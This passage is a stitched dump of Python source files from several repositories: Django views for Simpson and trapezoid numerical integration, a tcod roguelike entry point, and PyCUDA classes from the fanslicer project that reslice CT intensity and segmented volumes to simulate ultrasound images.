fb = evaluate_fx(fx, b)
fm = evaluate_fx(fx, m)
value = ((b - a)/6)*(fa + 4*fm + fb)
h = (b - a)/2
d4x = get_dx(fx, 4)
d4e = evaluate_fx(str(d4x), ((b + a)/2))
error = (-(h**(5))/90)*d4e
return {
'integral': value,
'error': abs(round(error, 3))
}
# Simpson's rule 1/3 composite
def simpson_13_composite(fx, a, b, n):
fa = evaluate_fx(fx, a)
fb = evaluate_fx(fx, b)
h = (b - a) / n
sum_1 = 0
sum_2 = 0
for i in range(1,n):
c = a + i*h
fc = evaluate_fx(fx, c)
if i%2 == 0:
# Sumatory 1
sum_1 = fc + sum_1
else:
# Sumatory 1
sum_2 = fc + sum_2
value = (h/3)*(fa + 2*sum_1 + 4*sum_2 + fb)
d4x = get_dx(fx, 4)
d4e = evaluate_fx(str(d4x), ((b + a)/2))
error = ((b - a)*(h**(4))/180)*d4e
return {
'integral': value,
'error': abs(round(error, 3))
}
# Simpson's rule 3/8 simple
def simpson_38_simple(fx, a, b):
h = (b - a)/3
fa = evaluate_fx(fx, a)
fb = evaluate_fx(fx, b)
f_1 = evaluate_fx(fx, (2*a + b)/3)
f_2 = evaluate_fx(fx, (2*b + a)/3)
value = (3*h/8)*(fa + 3*f_1 + 3*f_2 + fb)
d4x = get_dx(fx, 4)
d4e = evaluate_fx(str(d4x), ((b + a)/2))
error = -(3/80)*(h**(5))*d4e
return {
'integral': value,
'error': abs(round(error, 3))
}
# Simpson's rule 3/8 composite
def simpson_38_composite(fx, a, b, n):
fa = evaluate_fx(fx, a)
fb = evaluate_fx(fx, b)
h = (b - a) / n
sum_1 = 0
sum_2 = 0
for i in range(1,n):
c = a + i*h
fc = evaluate_fx(fx, c)
if i%2 == 0:
# Sumatory 1
sum_1 = fc + sum_1
else:
# Sumatory 1
sum_2 = fc + sum_2
value = (3*h/8)*(fa + 2*sum_1 + 3*sum_2 + fb)
d4x = get_dx(fx, 4)
d4e = evaluate_fx(str(d4x), ((b + a)/2))
error = (n/80)*(h**(5))*d4e
return {
'integral': value,
'error': abs(round(error, 3))
}
# Simpson 1/3 rule with pairs
def simpson_pairs_13(x, y):
n = len(x)
value = 0
sum_1 = y[0] + y[-1]
sum_2 = 0
sum_3 = 0
h = 0
count = 0
for i in range(1, n, 2):
limit = x[i] - x[i - 1]
h = h + limit
count = count + 1
for i in range(1, n-1):
if (i % 2) == 0:
# Sumatory 3
sum_3 = sum_3 + (y[i])
else:
# Sumatory 2
sum_2 = sum_2 + (y[i])
h = h/count
value = (h/3)*(sum_1 + 4*sum_2 + 2*sum_3)
return {
'integral': value,
'error': abs(0)
}
# Simpson 3/8 rule with pairs
def simpson_pairs_38(x, y):
n = len(x)
value = 0
sum_1 = y[0] + y[-1]
sum_2 = 0
sum_3 = 0
h = 0
count = 0
for i in range(1, n, 2):
limit = x[i] - x[i - 1]
h = h + limit
count = count + 1
for i in range(3, n - 1, 3):
sum_2 = sum_2 + y[i]
for i in range(0, n-1):
if (i % 3) != 0:
# Sumatory 3
sum_3 = sum_3 + (y[i])
h = h/count
value = (3*h/8)*(sum_1 + 2*sum_2 + 3*sum_3)
return {
'integral': value,
'error': abs(0)
}
def simpson_method(req):
# Get params
params = req.GET
type = params.get('type')
iterations = int(params.get('iterations')) if params.get('iterations') != None else 100
# Get body
body = json.loads( req.body.decode('utf-8') )
if type == '1/3_simple':
fx = body['fx']
fx = format_fx(fx)
a = body['a']
b = body['b']
data = simpson_13_simple(fx, a, b)
elif type == '1/3_composite':
fx = body['fx']
fx = format_fx(fx)
a = body['a']
b = body['b']
data = simpson_13_composite(fx, a, b, iterations)
elif type == '3/8_simple':
fx = body['fx']
fx = format_fx(fx)
a = body['a']
b = body['b']
data = simpson_38_simple(fx, a, b)
elif type == '3/8_composite':
fx = body['fx']
fx = format_fx(fx)
a = body['a']
b = body['b']
data = simpson_38_composite(fx, a, b, iterations)
elif type == '1/3_ordered_pairs':
x = body['x']
y = body['y']
data = simpson_pairs_13(x, y)
elif type == '3/8_ordered_pairs':
x = body['x']
y = body['y']
data = simpson_pairs_38(x, y)
else:
fx = body['fx']
fx = format_fx(fx)
a = body['a']
b = body['b']
data = simpson_13_composite(fx, a, b, iterations)
res = json.dumps(data)
return HttpResponse(res, content_type="application/json")
```
#### File: methods/integral/trapz_method.py
```python
import json
from mathapi.lib.math_ops import absolute_error, evaluate_fx, format_fx, get_dx
from django.http import HttpResponse
def trapz_simple(fx, a, b):
fa = evaluate_fx(fx, a)
fb = evaluate_fx(fx, b)
dx = get_dx(fx, 2)
dab = evaluate_fx(str(dx), a)
value = (b - a)*(fa + fb)/2
error = (-1/12)*(dab)*((b - a)**3)
return {
'integral': value,
'error': round(abs(error), 3)
}
def trapz_composite(fx, a, b, iterations):
fa = evaluate_fx(fx, a)
fb = evaluate_fx(fx, b)
dx = get_dx(fx, 2)
dab = evaluate_fx(str(dx), 0)
h = (b - a)/iterations
fafb = (fa + fb)/2
sumatory = 0
for i in range(0, iterations):
eval_value = a + i*h
f_eval = evaluate_fx(fx, eval_value)
sumatory = f_eval + sumatory
value = h*( (fafb) + sumatory )
error = -( ((b - a)**3)/(12*(iterations**2)) * (dab) )
return {
'integral': value,
'error': round(abs(error), 3)
}
def trapz_pairs(x, y):
n = len(x)
value = 0
for i in range(1, n):
a = x[i - 1]
b = x[i]
h = b - a
value = (h/2)*(y[i - 1] + y[i]) + value
return {
'integral': value,
'error': 0.0
}
def trapz_method(req):
# Get params
params = req.GET
type = params.get('type')
iterations = int(params.get('iterations')) if params.get('iterations') != None else 100
# Get body
body = json.loads( req.body.decode('utf-8') )
if type == 'simple':
fx = body['fx']
fx = format_fx(fx)
a = body['a']
b = body['b']
data = trapz_simple(fx, a, b)
elif type == 'composite':
fx = body['fx']
fx = format_fx(fx)
a = body['a']
b = body['b']
data = trapz_composite(fx, a, b, iterations)
elif type == 'ordered_pairs':
x = body['x']
y = body['y']
data = trapz_pairs(x, y)
else:
fx = body['fx']
fx = format_fx(fx)
a = body['a']
b = body['b']
data = trapz_composite(fx, a, b, iterations)
res = json.dumps(data)
return HttpResponse(res, content_type="application/json")
``` |
{
"source": "jram930/rogue-learn-1",
"score": 2
} |
#### File: rogue-learn-1/src/main.py
```python
import tcod
from tcod.event import Event
from tcod.libtcodpy import map_get_height
from actions import EscapeAction, MovementAction
from engine import Engine
from entity import Entity
from procgen import generate_dungeon
from input_handlers import EventHandler
def main() -> None:
screen_width = 80
screen_height = 50
map_width = 80
map_height = 45
room_max_size = 10
room_min_size = 6
max_rooms = 30
max_monsters_per_room = 2
tileset = tcod.tileset.load_tilesheet(
"dejavu10x10_gs_tc.png", 32, 8, tcod.tileset.CHARMAP_TCOD
)
event_handler = EventHandler()
player = Entity(int(screen_width / 2),
int(screen_height / 2), "@", (255, 255, 255))
game_map = generate_dungeon(
max_rooms=max_rooms,
room_min_size=room_min_size,
room_max_size=room_max_size,
map_width=map_width,
map_height=map_height,
max_monsters_per_room=max_monsters_per_room,
player=player
)
engine = Engine(event_handler=event_handler,
game_map=game_map, player=player)
with tcod.context.new_terminal(
screen_width,
screen_height,
tileset=tileset,
title="rogue-learn-1",
vsync=True,
) as context:
root_console = tcod.Console(screen_width, screen_height, order="F")
while True:
engine.render(console=root_console, context=context)
events = tcod.event.wait()
engine.handle_events(events)
if __name__ == "__main__":
main()
``` |
{
"source": "jramalhinho/fan-slicer",
"score": 3
} |
#### File: fanslicer/pycuda_simulation/intensity_volume.py
```python
import json
import os
import numpy as np
import matplotlib.pyplot as plt
import pydicom as dicom
import nibabel as nib
import pycuda.driver as drv
import pycuda.gpuarray as gpua
from pycuda.compiler import SourceModule
import fanslicer.pycuda_simulation.cuda_reslicing as cres
class IntensityVolume:
"""
Class that holds a 3D intensity volume image
and tools for reslicing it
"""
def __init__(self,
config_dir,
vol_dir,
image_num=1,
downsampling=1,
file_type='npy',
npy_config=None):
"""
Create intensity volume object
:param config_dir: json file with reslicing parameters
:param vol_dir: file with 3D volume
:param file_type: type of 3D volume to be loaded,
currently nii or dicom
:param image_num: number of images to consider for preallocation
:param downsampling: downsampling factor on image dimensions
"""
self.planar_resolution = None
self.ct_volume = None
self.voxel_size = None
self.bound_box = None
self.xdim = None
self.ydim = None
self.zdim = None
if os.path.isfile(config_dir):
config_file = open(config_dir)
self.config = json.load(config_file)
else:
raise ValueError("No valid config file!")
# Check whether a nii or dicom is to be
# loaded
if file_type == 'dicom':
self.load_volume_from_dicom(vol_dir)
if file_type == 'nii':
self.load_volume_from_nii(vol_dir)
if file_type == 'npy':
self.load_volume_from_npy(vol_dir, npy_config)
# In order to speed up slicing, preallocate variables
# Call function to preallocate relevant variables
# to an existing list, first the GPU ones
self.g_variables = []
# Image dimensioning parameters
self.image_variables = []
# Kernel dimensioning
self.blockdim = np.array([1, 1])
# Initialise image num and downsample
self.image_num = None
self.downsampling = None
# Now run allocation to set these vars
self.preallocate_gpu_var(image_num=image_num,
downsampling=downsampling)
# Read kernel source code in C++
self.kernel_code = cres.RESLICING_KERNELS
def load_volume_from_dicom(self, dicom_dir):
"""
Loads volume from Dicom
:param dicom_dir: dicom file
"""
if not os.path.isdir(dicom_dir):
raise ValueError("No valid file directory for dicom!")
image_list = os.listdir(dicom_dir)
image_list.sort()
# Get the parameters of the volume by checking the first image
first_image = dicom.dcmread(dicom_dir + image_list[0])
# Get planar resolution
self.planar_resolution = first_image.PixelSpacing
# Get z stepping
z_step = first_image.SpacingBetweenSlices
# Define voxel size
self.voxel_size = np.hstack((self.planar_resolution,
abs(z_step)))
# Get x y z dimensions
self.xdim = first_image.pixel_array.shape[0]
self.ydim = first_image.pixel_array.shape[1]
self.zdim = len(image_list)
self.ct_volume = np.zeros([self.xdim, self.ydim, self.zdim])
# Get intensity scales
for dicom_key in first_image.keys():
if first_image[dicom_key].keyword == 'RescaleIntercept':
intensity_bias = first_image[dicom_key].value
if first_image[dicom_key].keyword == 'RescaleSlope':
intensity_slope = first_image[dicom_key].value
# Go through every image
for i in range(self.zdim):
# Get image
current_image = dicom.dcmread(dicom_dir + image_list[i]).pixel_array
# Add to volume, taking into account z direction
if z_step > 0:
self.ct_volume[:, :, i] = current_image \
* intensity_slope + intensity_bias
else:
self.ct_volume[:, :, self.zdim - i - 1] \
= current_image * intensity_slope \
+ intensity_bias
# Define bounding box
min_x = first_image.ImagePositionPatient[0]
max_x = min_x + self.planar_resolution[0] * (self.xdim - 1)
min_y = first_image.ImagePositionPatient[1]
max_y = min_y + self.planar_resolution[1] * (self.xdim - 1)
if z_step < 0:
max_z = first_image.ImagePositionPatient[2]
min_z = max_z + z_step * (self.zdim - 1)
else:
min_z = first_image.ImagePositionPatient[2]
max_z = min_z + z_step * (self.zdim - 1)
self.bound_box = np.array([[min_x, min_y, min_z],
[max_x, max_y, max_z]])
return 0
def load_volume_from_nii(self, nii_dir):
"""
Loads volume from nii
:param nii_dir: nii file
"""
nii_file = nib.load(nii_dir)
volume = nii_file.get_fdata()
volume = np.flip(volume, axis=0)
volume = np.flip(volume, axis=1)
self.ct_volume = np.asarray(volume)
self.xdim = volume.shape[0]
self.ydim = volume.shape[1]
self.zdim = volume.shape[2]
# Get resolution parameters
affine = nii_file.affine
self.planar_resolution = abs(np.array([affine[0, 0],
affine[1, 1]]))
self.voxel_size = abs(np.array([affine[0, 0],
affine[1, 1],
affine[2, 2]]))
# Get bounding box, checking orientations
if affine[2, 2] > 0:
max_z = affine[2, 3] + affine[2, 2] * (self.zdim-1)
min_z = affine[2, 3]
else:
min_z = affine[2, 3] + affine[2, 2] * (self.zdim-1)
max_z = affine[2, 3]
if affine[1, 1] > 0:
max_y = affine[1, 3] + affine[1, 1] * (self.ydim-1)
min_y = affine[1, 3]
else:
min_y = affine[1, 3] + affine[1, 1] * (self.ydim-1)
max_y = affine[1, 3]
if affine[0, 0] > 0:
max_x = affine[0, 3] + affine[0, 0] * (self.xdim-1)
min_x = affine[0, 3]
else:
min_x = affine[0, 3] + affine[0, 0] * (self.xdim-1)
max_x = affine[0, 3]
self.bound_box = np.array([[min_x, min_y, min_z],
[max_x, max_y, max_z]])
def load_volume_from_npy(self, npy_dir, npy_config):
"""
Loads volume from npy file
:param npy_dir: nii file
:param npy_config: volume resolution for the npy volume
"""
# Add volume data
self.ct_volume = np.load(npy_dir)
# Add resolution parameters, first get config
if os.path.isfile(npy_config):
npy_config_file = open(npy_config)
npy_config = json.load(npy_config_file)
else:
raise ValueError("No valid config for npy file!")
# Now load the parameters
self.planar_resolution = np.array(npy_config["planar resolution"])
self.voxel_size = np.array(npy_config["voxel size"])
self.bound_box = np.array(npy_config["bounding box"])
return 0
def scroll_volume(self):
"""
Shows volume stored in intensity volume object
"""
for z_ind in range(self.zdim):
plt.cla()
plt.imshow(self.ct_volume[:, :, z_ind], cmap='gray')
plt.pause(0.01)
def preallocate_gpu_var(self,
image_num,
downsampling):
"""
Function to generate local gpu variables that will
be used for simulation. Variable sizes depend on the
config parameters. g_ prefix indicates gpu variables
:param image_num: maximum number of images to be simulated
:param downsampling: downsampling value on image dimensions
per call
"""
# First check if current image variables are empty or not,
# (if they have been set before). If they are not, reset
if self.g_variables:
self.g_variables = []
if self.image_variables:
self.image_variables = []
# Check if downsampling is at least 1
if downsampling < 1:
raise ValueError("Downsampling must be greater than 1")
# Check if maximum number of images is valid
if not isinstance(image_num, int) or image_num <= 0:
raise ValueError('image_num must be positive integer')
self.image_num = image_num
self.downsampling = downsampling
# Now, choose between curvilinear and linear array
transducer_type = self.config["simulation"]["transducer"]
if transducer_type == "curvilinear":
# For the curvilinear case, get
# geometrical parameters of fan shape as a float:
# 0-Angular ray resolution, 1-ray depth resolution, 2-angle aperture
# 3-ray depth, 4-ray offset to origin, 5-ray offset to image top
fan_parameters = np.array(self.config["simulation"]["fan_geometry"])
fan_parameters[0] = np.deg2rad(fan_parameters[0])
fan_parameters[2] = np.deg2rad(fan_parameters[2])
fan_parameters[3:6] = fan_parameters[3:6] * fan_parameters[1]
fan_parameters = fan_parameters.astype(np.float32)
# Append them to image variables (becomes index 0)
self.image_variables.append(fan_parameters)
# Get point cloud dimensions from fan parameters, necessary to
# know how many points will be sampled and used for intersection
coord_w = len(np.arange((-fan_parameters[2] / 2).astype(np.float32),
(fan_parameters[2] / 2).astype(np.float32),
fan_parameters[0]))
coord_h = len(np.arange(fan_parameters[4],
fan_parameters[4] + fan_parameters[3],
fan_parameters[1]))
# Append to image variables (becomes index 1)
slice_dim = np.array([coord_w, coord_h, image_num]).astype(np.int32)
self.image_variables.append(slice_dim)
# Through downsampling, obtain the output image dimensions
# and append (becomes index 2)
image_dim_2d = np.array(self.config["simulation"]
["image_dimensions"])
image_dim = np.append(image_dim_2d / downsampling, image_num) \
.astype(np.int32)
self.image_variables.append(image_dim)
# Do the same for the image pixel size (becomes index 3)
pixel_size = np.array(self.config["simulation"]["pixel_size"])
pixel_size = (downsampling * pixel_size).astype(np.float32)
self.image_variables.append(pixel_size)
# Knowing these dimensions, now append preallocate all
# GPU variables. First, 2D and 3D positions of the fans
# (become index 0 and 1, respectively)
self.g_variables. \
append(gpua.GPUArray((1, np.prod(slice_dim) * 3),
dtype=np.float32))
# The 3D positions, with the same size (becomes index 1)
self.g_variables.\
append(gpua.GPUArray((1, np.prod(slice_dim) * 3),
dtype=np.float32))
# The fan intersection with the volume (becomes index 2)
self.g_variables. \
append(gpua.GPUArray((1, np.prod(slice_dim)),
dtype=np.float32))
# The volume to be slice, in a 1D array. The only non-empty
# array (becomes index 3)
volume = self.ct_volume.copy()
volume = volume.reshape([1, np.prod(volume.shape)], order="F")
self.g_variables.append(gpua.to_gpu(volume.astype(np.float32)))
# Now, the outputs, with image_dim as dimension, both images
# and fan shape outline used for interpolation (become
# index 4 and 5, respectively)
self.g_variables. \
append(gpua.GPUArray((1, np.prod(image_dim)),
dtype=np.float32))
self.g_variables. \
append(gpua.GPUArray((1, np.prod(image_dim)),
dtype=np.int32))
# Determine optimal blocksize for kernels
blockdim_x, blockdim_y = cres.get_block_size(coord_w, coord_h)
self.blockdim = np.array([blockdim_x, blockdim_y])
elif transducer_type == "linear":
# For the linear case, variable definition is simpler
# Get rectangular plane dimensions first, and append
# to image variables (becomes index 0)
image_dim_2d = np.array(self.config["simulation"]
["image_dimensions"])
image_dim = np.append(image_dim_2d / downsampling, image_num) \
.astype(np.int32)
self.image_variables.append(image_dim)
# Do the same for the image pixel size (becomes index 1)
pixel_size = np.array(self.config["simulation"]["pixel_size"])
pixel_size = (downsampling * pixel_size).astype(np.float32)
self.image_variables.append(pixel_size)
# Now preallocate gpu variables, first the positions
# (becomes index 0)
self.g_variables. \
append(gpua.GPUArray((1, np.prod(image_dim) * 3),
dtype=np.float32))
# Secondly, volume intersections that do not
# need to be warped in this case (becomes index 1)
self.g_variables. \
append(gpua.GPUArray((1, np.prod(image_dim)),
dtype=np.float32))
# The volume to be intersected (becomes
# index 2)
volume = self.ct_volume.copy()
volume = volume.reshape([1, np.prod(volume.shape)], order="F")
self.g_variables.append(gpua.to_gpu(volume.astype(np.float32)))
# Determine optimal blocksize for kernels
blockdim_x, blockdim_y = cres.get_block_size(image_dim[0],
image_dim[1])
self.blockdim = np.array([blockdim_x, blockdim_y])
else:
# In case the transducer is another option
raise ValueError("No valid transducer type!")
def simulate_image(self,
poses=np.eye(4),
image_num=1,
out_points=False):
"""
Function that generates a set of 2D CT images from
intensity volume. Uses the function
intensity_slice_volume or linear_intensity_slice_volume
:param poses: array with probe poses
:param image_num: number of images to slice
:param out_points: bool to get sampling positions or not
:return: positions in 3D, stack of resulting images
"""
# Check if number of images matches number of poses
if poses.shape[1]/4 != image_num:
raise ValueError("Input poses do not match image number!")
# In order to not fix the number of images to be used, check
# if image num is the same as the one considered by the object
# If they differ, preallocate again
current_image_num = self.image_num
if image_num != current_image_num:
self.preallocate_gpu_var(image_num=image_num,
downsampling=self.downsampling)
print("Number of images was changed from " +
str(current_image_num) + " to " + str(image_num))
# Simulate images
volume_dim = self.ct_volume.shape
if self.config["simulation"]["transducer"] == "curvilinear":
points, images = intensity_slice_volume(
self.kernel_code,
self.image_variables,
self.g_variables,
self.blockdim,
self.bound_box,
volume_dim,
self.voxel_size,
poses=poses,
out_points=out_points)
else:
points, images = linear_intensity_slice_volume(
self.kernel_code,
self.image_variables,
self.g_variables,
self.blockdim,
self.bound_box,
volume_dim,
self.voxel_size,
poses=poses,
out_points=out_points)
return points, images
def intensity_slice_volume(kernel_code,
image_variables,
g_variables,
blockdim,
bound_box,
vol_dim,
voxel_size,
poses,
out_points=False):
"""
Function that slices an intensity volume with fan shaped sections
section defined by poses of a curvilinear array
:param kernel_code: CUDA C++ kernel code to compile
:param image_variables: image dimensioning variable list
:param g_variables: All preallocated GPU variables
as described in the preallocation function. A list with
the following indexes:
0 - fan positions in 2D
1 - fan positions in 3D
2 - intensities mapped in fan positions
3 - the target intensity volume
4 - the output images in image space
5 - the 2D fan mask outline
:param blockdim: block dimensions for CUDA kernels
:param bound_box: bounding box of target volume
:param vol_dim: 3D intensity volume dimensions
:param voxel_size: voxel_size of the volume
:param poses: input set of poses
:param out_points: bool to get fan positions or not
:return: positions in 3D, stack of resulting images
"""
# First, compile kernel code with SourceModule
cuda_modules = SourceModule(kernel_code)
# Get image variables from input
fan_parameters = image_variables[0]
slice_dim = image_variables[1]
image_dim = image_variables[2]
pixel_size = image_variables[3]
# Define voxel size for intersection of intensity volume
voxel_size = voxel_size.astype(np.float32)
# Get size of one image, useful to get array of images
im_size = image_dim[0] * image_dim[1]
# Get block and grid dimensions as int
blockdim_x = int(blockdim[0])
blockdim_y = int(blockdim[1])
griddim_x = int(slice_dim[0] / blockdim_x)
griddim_y = int(slice_dim[1] / blockdim_y)
image_num = int(slice_dim[2])
# Convert poses to 1D array to be input in a kernel
pose_array = np.zeros((1, 9 * image_num)).astype(np.float32)
# And an array to offset fan position per image plane
offset_array = np.zeros((1, 3 * image_num)).astype(np.float32)
for p_ind in range(image_num):
pose = poses[:, 4 * p_ind:4 * (p_ind + 1)]
# Allocate the pose
pose_array[0, 9 * p_ind:9 * (p_ind + 1)] = \
np.hstack((pose[0, 0:2], pose[0, 3],
pose[1, 0:2], pose[1, 3],
pose[2, 0:2], pose[2, 3]))
# Allocate the offset
offset_array[0, 3 * p_ind:3 * (p_ind + 1)] = pose[0:3, 1]
# 1-Run position computation kernel, acts on index 0 and 1 of
# the gpu variables, get kernel
transform_kernel = cuda_modules.get_function("transform")
# Then run it
transform_kernel(g_variables[1],
g_variables[0],
drv.In(pose_array),
drv.In(offset_array),
drv.In(fan_parameters),
np.int32(image_num),
block=(blockdim_x, blockdim_y, 3),
grid=(griddim_x, griddim_y, image_num))
# Collect the output to a CPU array
positions_3d = np.empty((1, np.prod(slice_dim) * 3), dtype=np.float32)
# In case points are to be used or visualised (with out_points as True)
if out_points is True:
g_variables[1].get(positions_3d)
positions_3d = positions_3d.reshape([3, np.prod(slice_dim)]).T
# 2-Next step, run slicing kernel, where intensity values are
# placed in the positions. Define volume dimensions
intensity_volume_dims = np.hstack((bound_box[0, :],
vol_dim[0],
vol_dim[1],
vol_dim[2])).astype(np.float32)
# Call kernel from file
slice_kernel = cuda_modules.get_function('weighted_slice')
slice_kernel(g_variables[2],
g_variables[1],
g_variables[3],
drv.In(intensity_volume_dims),
drv.In(voxel_size),
drv.In(slice_dim),
block=(blockdim_x, blockdim_y, 1),
grid=(griddim_x, griddim_y, image_num))
# 3-Map pixels to fan like image
# Define bounds of image output in 2d coordinates as float
image_bounding_box = np.array([-image_dim[0] * pixel_size[0]/2*1000,
0, image_dim[0],
image_dim[1]]).astype(np.float32)
# Allocate output images, the intensity image as a float, and the
# fan outline as an int. These must be in CPU.
intensity_images = np.empty((1, np.prod(image_dim)), dtype=np.float32)
masks = np.empty((1, np.prod(image_dim)), dtype=np.int32)
# Call kernel from file
map_kernel = cuda_modules.get_function('intensity_map_back')
# Then run it, multiplying coordinates value by a 1000, in order
# to avoid sampling errors
map_kernel(g_variables[4],
g_variables[5],
g_variables[2],
g_variables[0]*1000,
drv.In(slice_dim),
drv.In(image_bounding_box),
drv.In(pixel_size*1000),
block=(blockdim_x, blockdim_y, 1),
grid=(griddim_x, griddim_y, image_num))
# Create a volume with generated images
intensity_image_array = np.zeros((image_dim[1],
image_dim[0],
image_dim[2])).astype(np.float32)
# Gather the results
g_variables[4].get(intensity_images)
g_variables[4].fill(0)
g_variables[5].get(masks)
g_variables[5].fill(0)
for plane in range(image_num):
# Get image and reshape it
current_image = intensity_images[0, im_size*plane:
im_size*(plane+1)]
# Get masks that weight values
current_mask = masks[0, im_size*plane:
im_size*(plane + 1)]
# Normalise by amount of points added to image output, using the
# the occurrences output by mask, ignoring divide error
with np.errstate(divide='ignore'):
current_image = np.divide(current_image, current_mask)
current_image = current_image.reshape(image_dim[0], image_dim[1]).T
# Scale intensities, by setting nan values to minimum
nan_indexes = np.where(np.isnan(current_image))
current_image[nan_indexes] = np.nanmin(current_image)
# Allocate to output
intensity_image_array[:, :, plane] = current_image
# Output a stack of images, where each z-slice has a plane,
# and the corresponding 3D positions
return positions_3d, intensity_image_array
def linear_intensity_slice_volume(kernel_code,
image_variables,
g_variables,
blockdim,
bound_box,
vol_dim,
voxel_size,
poses,
out_points=False):
"""
Function that slices an intensity volume with rectangular sections
defined by poses of a linear array
:param kernel_code: CUDA C++ kernel code to compile
:param image_variables: image dimensioning variable list
:param g_variables: All preallocated GPU variables
as described in the preallocation function. A list with
the following indexes:
0 - rectangle positions in 3D
1 - rectangular intensity images
2 - the target intensity volume
:param blockdim: block dimensions for CUDA kernels
:param bound_box: bounding box of target volume
:param vol_dim: 3D intensity volume dimensions
:param voxel_size: voxel_size of the volume
:param poses: input set of poses
:param out_points: bool to get rectangular positions or not
:return: positions in 3D, stack of resulting images
"""
# First, compile kernel code with SourceModule
cuda_modules = SourceModule(kernel_code)
# Get image variables from input
image_dim = image_variables[0]
pixel_size = image_variables[1]
# Define voxel size for intersection of intensity volume
voxel_size = voxel_size.astype(np.float32)
# Get size of one image, useful to get array of images
im_size = image_dim[0] * image_dim[1]
# Get block and grid dimensions as int
blockdim_x = int(blockdim[0])
blockdim_y = int(blockdim[1])
griddim_x = int(image_dim[0] / blockdim_x)
griddim_y = int(image_dim[1] / blockdim_y)
image_num = int(image_dim[2])
# Convert poses to 1D array to be input in a kernel
pose_array = np.zeros((1, 9 * image_num)).astype(np.float32)
for p_ind in range(image_num):
pose = poses[:, 4*p_ind:4*(p_ind+1)]
# Allocate the pose
pose_array[0, 9*p_ind:9*(p_ind+1)] = \
np.hstack((pose[0, 0:2], pose[0, 3],
pose[1, 0:2], pose[1, 3],
pose[2, 0:2], pose[2, 3]))
# 1-Run position computation kernel, acts on index 0
# the gpu variables, get kernel
transform_kernel = cuda_modules.get_function("linear_transform")
# Then run it
transform_kernel(g_variables[0],
drv.In(pose_array),
drv.In(pixel_size),
drv.In(image_dim),
block=(blockdim_x, blockdim_y, 3),
grid=(griddim_x, griddim_y, image_num))
# Collect the output to a CPU array
positions_3d = np.empty((1, np.prod(image_dim) * 3), dtype=np.float32)
# In case points are to be used or visualised (with out_points as True)
if out_points is True:
g_variables[0].get(positions_3d)
positions_3d = positions_3d.reshape([3, np.prod(image_dim)]).T
# 2-Next step, run slicing kernel, where intensity values are
# placed in the positions. Define volume dimensions
intensity_volume_dims = np.hstack((bound_box[0, :],
vol_dim[0],
vol_dim[1],
vol_dim[2])).astype(np.float32)
# Allocate space for output images, in CPU
intensity_images = np.empty((1, np.prod(image_dim)), dtype=np.float32)
# Call kernel from file
slice_kernel = cuda_modules.get_function('weighted_slice')
slice_kernel(g_variables[1],
g_variables[0],
g_variables[2],
drv.In(intensity_volume_dims),
drv.In(voxel_size),
drv.In(image_dim),
block=(blockdim_x, blockdim_y, 1),
grid=(griddim_x, griddim_y, image_num))
# Create a volume with generated images
intensity_image_array = np.zeros((image_dim[1],
image_dim[0],
image_dim[2])).astype(np.float32)
# Gather the results
g_variables[1].get(intensity_images)
for plane in range(image_num):
# Get each image and reshape it
current_image = intensity_images[0, im_size*plane:
im_size*(plane+1)]
current_image = current_image.reshape(image_dim[1], image_dim[0])
# Allocate to output
intensity_image_array[:, :, plane] = current_image
# Output a stack of images, where each z-slice has a plane,
# and the corresponding 3D positions
return positions_3d, intensity_image_array
```
#### File: fanslicer/pycuda_simulation/segmented_volume.py
```python
import json
import os
import numpy as np
import matplotlib.pyplot as plt
import pycuda.driver as drv
import pycuda.gpuarray as gpua
from pycuda.compiler import SourceModule
from scipy.ndimage.morphology import binary_fill_holes as fill
from scipy.ndimage.morphology import binary_erosion as erode
from scipy.ndimage.morphology import binary_dilation as dilate
import fanslicer.pycuda_simulation.mesh as mesh
import fanslicer.pycuda_simulation.cuda_reslicing as cres
class SegmentedVolume:
"""
Class that holds a segmented volume, with both
meshes and 3D binary volumes
"""
def __init__(self,
mesh_dir,
config_dir,
image_num=1,
downsampling=1,
voxel_size=1.0):
"""
Create segmented volume object
:param mesh_dir: directory with vtk models used in slicing
:param config_dir: json file with reslicing parameters and
model names to be used
:param voxel_size: isotropic voxel size considered to
generate the binary volumes for each vtk model
:param image_num: number of images to consider for preallocation
:param downsampling: downsampling factor on image dimensions
"""
self.binary_volumes = dict()
if voxel_size > 0:
self.voxel_size = voxel_size
else:
raise ValueError("Voxel size must be positive!")
# Load meshes if a directory is given
self.config = None
self.meshes = dict()
if os.path.isfile(config_dir):
config_file = open(config_dir)
self.config = json.load(config_file)
else:
raise ValueError("No valid config file!")
# First, load meshes to constructor
self.load_vtk_from_dir(mesh_dir)
# Then, load or generate simulation binary volumes
self.load_binary_volumes(mesh_dir)
# Now, preallocate variables to speed up reslicing
# Call function to preallocate relevant variables
# to existing lists, first the GPU ones
self.g_variables = []
# Image dimensioning parameters
self.image_variables = []
self.blockdim = np.array([1, 1])
# Initialise image num and downsample
self.image_num = None
self.downsampling = None
# Now run allocation to set these vars
self.preallocate_bin_gpu_var(image_num=image_num,
downsampling=downsampling)
# Read kernel source code in C++
self.kernel_code = cres.RESLICING_KERNELS
def load_vtk_from_dir(self,
mesh_dir):
"""
Loads vtk files into mesh3D objects, according
to self.config
:param mesh_dir: directory with vtk files
"""
if self.config is None:
raise ValueError("SegmentedVolume object has no config")
if not os.path.isdir(mesh_dir):
raise ValueError("No valid mesh directory")
# Get relevant files from the config
meshes_to_load = self.config["models"]["files"]
mesh_dict = {}
for file in meshes_to_load:
mesh_file = os.path.join(mesh_dir, file + '.vtk')
# Allocate mesh to mesh list if it exists
if os.path.isfile(mesh_file):
mesh_dict[file.replace(" ", "_")] =\
mesh.load_mesh_from_vtk(mesh_file)
else:
raise ValueError(file + '.vtk not found')
self.meshes = mesh_dict
return 0
def load_binary_volumes(self,
data_dir):
"""
Load or generate binary models from relevant meshes
If binary volumes do not exist in data dir, a binary volume
is generated for every relevant mesh defined in config
:param data_dir: directory from where binary volumes
is loaded/saved
"""
if not os.path.isdir(data_dir):
raise ValueError("No valid data directory")
# Prepare dictionary that contains models
volume_dict = dict()
for model in range(len(self.config['simulation']
['simulation_models'])):
# Check if model is intended for simulation
if self.config['simulation']['simulation_models'][model]:
model_name = self.config['models']['files'][model]
model_name = model_name.replace(" ", "_")
# Get a bounding box and define volume margin
margin = np.array([20, 20, 20])
bound_box = self.meshes[model_name].get_bounding_box()
bound_box[0, :] = np.floor(bound_box[0, :]) - margin
bound_box[1, :] = np.floor(bound_box[1, :]) + margin
# Check if a binary map already exists
binary_name = 'binary_' + model_name + '.npy'
if os.path.isfile(data_dir + binary_name):
# Load a pre-saved model
volume = np.load(data_dir + binary_name)
print('Loaded ' + binary_name)
else:
# Generate a model
volume = voxelise_mesh(self.meshes[model_name],
